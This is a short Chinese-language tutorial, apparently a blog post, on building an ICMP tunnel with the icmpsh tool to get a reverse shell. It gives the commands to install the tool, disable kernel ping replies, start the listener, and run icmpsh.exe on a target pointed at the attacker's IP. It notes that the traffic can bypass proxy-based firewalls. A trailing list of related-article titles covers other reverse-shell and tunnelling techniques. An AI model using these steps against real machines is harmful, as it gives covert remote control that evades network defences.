利用icmpsh建立icmp隧道反弹shell

简介: 利用icmpsh建立icmp隧道反弹shell

首先在kali上安装icmpsh软件,软件地址https://github.com/inquisb/icmpsh.git

我们可以直接用git克隆过来git clone https://github.com/inquisb/icmpsh.git

640.jpg

然后我们还需要来安装python-impacket类库以保证对TCP、UDP、ICMP等协议的访问

pip2 install impacket

640.jpg接下来我们还需要关闭我们之前的ping命令应答程序,这样可以防止内核自己对ping包进行响应。

sysctl -w net.ipv4.icmp_echo_ignore_all=1

实验完成后开启系统ping的话将最后的1改为0即可

640.jpg

然后可以在kali上开始监听

python icmpsh_m.py 本机ip 目标ip

640.jpg

再把icmpsh.exe传输到靶机上

640.jpg

640.jpg

icmpsh.exe -t 192.168.110.140   -t后面接上攻击机的ip地址   回车

640.jpg

接收到shell。由于数据是利用PING请求/回复报文通过网络层传输,因此并不需要指定服务或者端口。这种流量是无法被基于代理的防火墙检测到的,因此这种方式可能绕过一些防火墙规则。



目录
相关文章
|
4月前
|
监控 网络协议 Unix
Linux命令-nc(端口监控、文件传输、反弹shell等)
Linux命令-nc(端口监控、文件传输、反弹shell等)
112 0
|
安全 NoSQL 关系型数据库
网络安全——利用ssrf操作内网redis写入计划任务反弹shell
今天的内容是ssrf漏洞的利用,环境选择的是discuz含有ssrf漏洞的版本,通过该漏洞来写入redis计划任务反弹shell,直接看操作
455 0
网络安全——利用ssrf操作内网redis写入计划任务反弹shell
|
NoSQL 安全 网络协议
|
6月前
|
Shell
反弹shell脚本(php-reverse-shell)
反弹shell脚本(php-reverse-shell)
107 0
|
6月前
|
安全 网络协议 Shell
[笔记]Windows安全之《一》反弹Shell
[笔记]Windows安全之《一》反弹Shell
|
网络协议 安全 Shell
[笔记]Windows安全之《一》反弹Shell
Windows安全之《一》反弹Shell
694 0
[笔记]Windows安全之《一》反弹Shell
|
11月前
|
网络协议 Go
通过Pingtunnel搭建ICMP隧道上线
假如实战环境中,其他协议都不能出网,唯一的突破口为ICMP协议(也就是ping出网),那么可利用ICMP隧道达到上线
417 0
|
11月前
|
安全 Shell Linux
使用OpenSsl加密反弹shell
当我们使用nc等工具进行反弹shell时,流量都是没经过加密,直接传输的,管理员很容易就能发现我们的异常流量
201 0
|
11月前
|
Shell 数据库连接 数据库
宝塔后渗透-添加用户|反弹shell
宝塔后渗透-添加用户|反弹shell
254 0
|
网络协议 安全 测试技术
内网穿透之icmp隧道搭建+上线CS+环境场景搭建(三)
内网穿透之icmp隧道搭建+上线CS+环境场景搭建
199 0
内网穿透之icmp隧道搭建+上线CS+环境场景搭建(三)